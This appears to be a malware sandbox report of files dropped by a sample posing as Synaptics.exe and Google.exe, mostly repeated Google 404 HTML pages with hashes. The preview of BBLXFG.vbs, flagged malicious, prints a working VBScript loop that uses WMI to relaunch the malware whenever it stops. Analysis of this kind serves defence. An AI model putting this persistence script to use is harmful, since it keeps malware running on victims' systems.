                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.260886377166901
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0wbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                                                  MD5:7026738CEBEFCAC6D48547202AE44A07
                                                                                                                                                                                  SHA1:52146341CACFA1D1CB3E6750154241CB9F8CA6DD
                                                                                                                                                                                  SHA-256:C8F1AE4622F1FA8D7080399867431B999B9D7FD6B6BF63E217F21A77D0FB15F2
                                                                                                                                                                                  SHA-512:ACE7F8B125DB6910F61D4445210141AEE35B2A52776CB80F231FDC0435F5BC4B87C4E1BFF21E2ABECFA0C39D8B5A4B82A5A3A32DEEF24EAB00E17269358B262B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fj_-Y6uyuuudAi_cDBTGuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8SfNXLu.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.257123613413498
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0KPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                                                                                  MD5:E65A7292C5A66522C87423F3759B9CDC
                                                                                                                                                                                  SHA1:BAABF53C0EF579D08C310C99C68815F2AD9BFEC3
                                                                                                                                                                                  SHA-256:BB40DBEBCD472A2B9DF75E0AF9CAA8DF11501CE0099569052DF43D601EFE4C0D
                                                                                                                                                                                  SHA-512:2F6667799896012DD54271D6A335FD7F764C236F03AFC987849AEDEB3A584238990A0AC310D1169020ED2A8E86FF9DD10BF13DE51065996A056148C759655E45
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mQlgw8ou1fNt36Dqpf9ZzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AUTFEvY.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.268105112205726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0wISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0+pAZewRDK4mW
                                                                                                                                                                                  MD5:93486B733F861B2B66F2451F42C5D818
                                                                                                                                                                                  SHA1:8851481C2F795C1D8338B024DDD0C88A463C5E37
                                                                                                                                                                                  SHA-256:9FB1CA84E3D7102A8FE75AE7E05884CB7986BA79DB933731D6DB05995B35DB5C
                                                                                                                                                                                  SHA-512:D9BD88D63E09ABC94E03BDC1526761B9E92DE603E907B8C7DDF2646DC36F3D6027167D9C34D46DCEA3AE0B06351B2A3A34059B043FBEBDD95EB6771BDAC9FB50
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f2O2YA-8Hfhx1xSLUDz1GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\B5V1fPp.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.266013564081671
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0siSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+fi+pAZewRDK4mW
                                                                                                                                                                                  MD5:90BECDD8F483F0C618CDF074EE0D6820
                                                                                                                                                                                  SHA1:9F3A5E2C44CC3E448C57FD9194102DA3DB6ACF55
                                                                                                                                                                                  SHA-256:FDB72A2DA0CF08B0491DE2C50156C921F13D6B8FAA62610D0D1EFB1BECC77F6D
                                                                                                                                                                                  SHA-512:A5357BC56863A9CFFF60C9BBBB9A9A046F9D0C8670B2C0EA500EC9C1AAA4981EA50CD40E3DFACBA45D76FEEE6A5AA8A024D1A799A2F2C1601DFD1179C13154D7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mF0D9NFKhY9j8lgaxQILLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BBLXFG.vbs

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                  Entropy (8bit):5.345318247674642
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:dF/UF5fDU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFhIt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                                                  MD5:F596BC8659C01069C152AB117BF64C71
                                                                                                                                                                                  SHA1:2EBB70409E06CD54CF9858FB79D6E3A92972C5D7
                                                                                                                                                                                  SHA-256:02FA29B1A896010971F9538BDE6FA8D6317B6E1397925C78B52CC7202EAD923A
                                                                                                                                                                                  SHA-512:536562FE1CDDB5B6F4F7476B87ACABA69B90231A833A43258392FC26EDEE7D99D0B069A3BDF99EE43DAB91FCE12B3BBBE5A1D733F54C96955C1D141CAE0A5BAC
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Google.exe"..fileset = """C:\Users\user\AppData\Local\Temp\._cache_Google.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Bqoehnz.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.259480443912994
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0MRgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+BRg+pAZewRDK4mW
                                                                                                                                                                                  MD5:7391BAAF23B536EEB36156DA2173991D
                                                                                                                                                                                  SHA1:187D11F0DB6D606A902FB9E6242DEF4C5CB7FA8C
                                                                                                                                                                                  SHA-256:7BC3DC174E6BB554E13B0F882B6C27439D45238EB9A60B2E7581C42B057064EF
                                                                                                                                                                                  SHA-512:06BBFE9CDE1F57CA8DA7CF7255B3725B1793F19309A1E9BCC27A53FA678FC666C7D3B0A16F31D0EB02D11DBFAE0BDD931D5993F6121BA37D0AEC9C33EF5D7A1C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="25VTF2Juor5KdJ0jqOhwYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\C5jpAxB.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.261472527881579
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0VDgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                                                  MD5:8E3FDB25F4C218544CE567052DEBB0E9
                                                                                                                                                                                  SHA1:70D38DAFB0B949A8A5A1F828A527ECF7733C1DBC
                                                                                                                                                                                  SHA-256:B5B5A6F57BBC085EEA0086DABBC49448CCF2D93558832BC4E21B17D969FC14DF
                                                                                                                                                                                  SHA-512:552EE6A87BF733160D020D9D9A91BDE34713CACA9C6174E5E7C75FD35775014067F7C4B847903CCDD85B22D2A7820E074C536A0D6DBF8A916B7E8EEA2BD344E6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-Khm9lNfHPojQrYv5vKsnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Co5afi6.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.25579738434708
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                                                                                  MD5:734FC4ABE6FFA6865375618BFC0FAA14
                                                                                                                                                                                  SHA1:3623EDBD4473FB709C5E10CA671C4D7243776EEC
                                                                                                                                                                                  SHA-256:B412D8586F1247DED594E2118208E536B6203481090C3FD1B845C25C4EFD9370
                                                                                                                                                                                  SHA-512:CFC326D5F7E443DC7BFF481A3F790129F07814F7E11E3CC11C0ECA83808AF0345794C4082F300DB6456AE56C24A72073A0879234B5A6476D7FEBD1C24D07537B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oSa40hzCdpRZlfc-fxV9MA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ENhjFQ6.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.253380432177164
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                                                                                  MD5:DEAE99BA611D6F503A2C96FD641C7FCF
                                                                                                                                                                                  SHA1:650EEEB5FF8841721FBE62BFC724917E0ED1A6BE
                                                                                                                                                                                  SHA-256:464B8DF425A3464196FA8899485ACF60F760508CE98353AAE5E279191766EB89
                                                                                                                                                                                  SHA-512:0A9393791FDA1B908DC919A25FFEF3E3FF3F7A6835432C54EE35B86126C9FC348DF13C61DC8EF6C775ED6F3D77C3DC6FE0FA990F72B0C84A12647BBA1A6287D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Emrc3UgjU_MhggrdPpCiGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ExDGBxz.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.249372871539867
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0BRpwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                                                                                  MD5:24E194EEF6D62F58668C5D8CFD828F48
                                                                                                                                                                                  SHA1:9643D31AF812F3A511A3839E81EA84B09A3C70E6
                                                                                                                                                                                  SHA-256:B9B9096E3E1B46CE7FED4D009624F5AEEB0D072B7A093F15DB629C8331D6E7FB
                                                                                                                                                                                  SHA-512:6E342A6490AC0DA59D57824ABBECAF3061E1ECDFAC105AE00D92777F8BDD4C0A7AA476BA994FDD58C12C5000FFF426AB516441914E0F8B8B9742D72B438F8EFF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pyrVBkbos4rYenBZggvQCg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Fqoha96.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.264379809689498
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0PxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                                                  MD5:3A3DE4D3B2448AD9033F6812CB128E79
                                                                                                                                                                                  SHA1:6963C9ADEDAEE2D614F37EF7DCEE90263B69B8E2
                                                                                                                                                                                  SHA-256:8199848A7860645041F0738ED9781687A2772AFBF68EA74182840D7F03B90B42
                                                                                                                                                                                  SHA-512:800474D552EA919CD5D2615B5FDF4ECCCB9AA8C92A9331747C681801A28F7C8663B47059B42E816AAE5FAB1278F5FD0D5900F9A886336CA64F81A3A585A41319
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5P2AqrQq-8lgyD_Z6JHwaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Fs9D2r3.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.264738346884858
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0/YXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Wa+pAZewRDK4mW
                                                                                                                                                                                  MD5:011BC5A37C73385C53EE25CA58C102E7
                                                                                                                                                                                  SHA1:2825FD3581E9C7C51B802124F28CE4194BB459F1
                                                                                                                                                                                  SHA-256:2B30CC18437244941A3CDDA7C31A5681A83D7597E7FBE8CE470C05DA9596A885
                                                                                                                                                                                  SHA-512:2D19A1E68CE988273CA238C72C14C9C189BAC4BBBC4947FCB6ABA8B83D84AD975333C90C4359AD1A2A9E8E13B36CD84FBA01EAC7AD7E1D3C4594BD25A0908009
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KReze46RNOsJHi8QybpumA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Goi7OGf.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.257137484371285
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+016SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                                                  MD5:187FF3C04471DD9FE121320FB3AF1ECB
                                                                                                                                                                                  SHA1:8DB06BDC3488E21C8A84C1F561E295C6BAAE9778
                                                                                                                                                                                  SHA-256:8D9C5C892B6FC5DA1675B4E9475C8EC3A0D71E5DAB70F8B4B297F58D3B2003B2
                                                                                                                                                                                  SHA-512:C6A1580EC96F6BDE9A01536578C7FEA7133F7B103BF86F807EAF84790725B78D3C5AD5795CC2CD810D75F1503D04B2ACF60950BB0BF21B0EE635514B2D199FBB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZPTEkfkxIw0hY4eZ8W15ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HgZVjzF.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.263604222484916
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+00IlzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ni+pAZewRDK4mW
                                                                                                                                                                                  MD5:856F12C3817BA1B1B8132200448E4D99
                                                                                                                                                                                  SHA1:6A4AF6C7A5B3734F29E4F40101ECAFFA44E8B225
                                                                                                                                                                                  SHA-256:64DC3C7BBECBEDBCE9549B840620D901427C0F27B9377A238277402D1D92B624
                                                                                                                                                                                  SHA-512:1AA09DE784182F56661E78073206C9D39C019BC5490D75BD64F899889FFE84F7A1930F746C83B63B19C979551A35D9D10588AA1F525C654E39551A718A9CFDFF
                                                                                                                                                                                  Malicious:false
